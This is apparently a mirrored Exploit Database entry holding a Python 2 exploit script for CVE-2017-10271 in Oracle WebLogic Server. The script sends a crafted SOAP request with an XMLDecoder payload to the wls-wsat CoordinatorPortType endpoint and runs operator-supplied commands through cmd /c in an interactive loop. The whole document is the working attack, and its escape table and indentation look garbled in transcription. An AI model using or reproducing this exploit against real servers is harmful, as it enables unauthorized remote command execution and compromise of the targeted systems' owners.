Oracle WebLogic Server 10.3.6.0.0 / 12.x – Remote Command Execution

• Exploit Database
• 14 阅读

• 作者： 1337g
  日期： 2017-12-26
• 类别：

  • remote
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/43392/

• import requests
  import sys
  
  url_in = sys.argv[1]
  payload_url = url_in + "/wls-wsat/CoordinatorPortType"
  payload_header = {'content-type': 'text/xml'}
  
  
  def payload_command (command_in):
  html_escape_table = {
  "&": "&",
  '"': """,
  "'": "'",
  ">": ">",
  "<": "<",
  }
  command_filtered = "<string>"+"".join(html_escape_table.get(c, c) for c in command_in)+"</string>"
  payload_1 = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n" \
  " <soapenv:Header> " \
  " <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"> \n" \
  " <java version=\"1.8.0_151\" class=\"java.beans.XMLDecoder\"> \n" \
  " <void class=\"java.lang.ProcessBuilder\"> \n" \
  "<array class=\"java.lang.String\" length=\"3\">" \
  "<void index = \"0\"> " \
  "<string>cmd</string> " \
  "</void>" \
  "<void index = \"1\"> " \
  "<string>/c</string>" \
  "</void>" \
  "<void index = \"2\"> " \
  + command_filtered + \
  "</void>" \
  "</array>" \
  "<void method=\"start\"/>" \
  "</void>" \
  "</java>" \
  "</work:WorkContext>" \
  " </soapenv:Header>" \
  " <soapenv:Body/>" \
  "</soapenv:Envelope>"
  return payload_1
  
  def do_post(command_in):
  result = requests.post(payload_url, payload_command(command_in ),headers = payload_header)
  
  if result.status_code == 500:
  print "Command Executed \n"
  else:
  print "Something Went Wrong \n"
  
  
  
  print "***************************************************** \n" \
   "**************** Coded By 1337g****************** \n" \
   "*CVE-2017-10271 Blind Remote Command Execute EXP* \n" \
   "***************************************************** \n"
  
  while 1:
  command_in = raw_input("Eneter your command here: ")
  if command_in == "exit" : exit(0)
  do_post(command_in)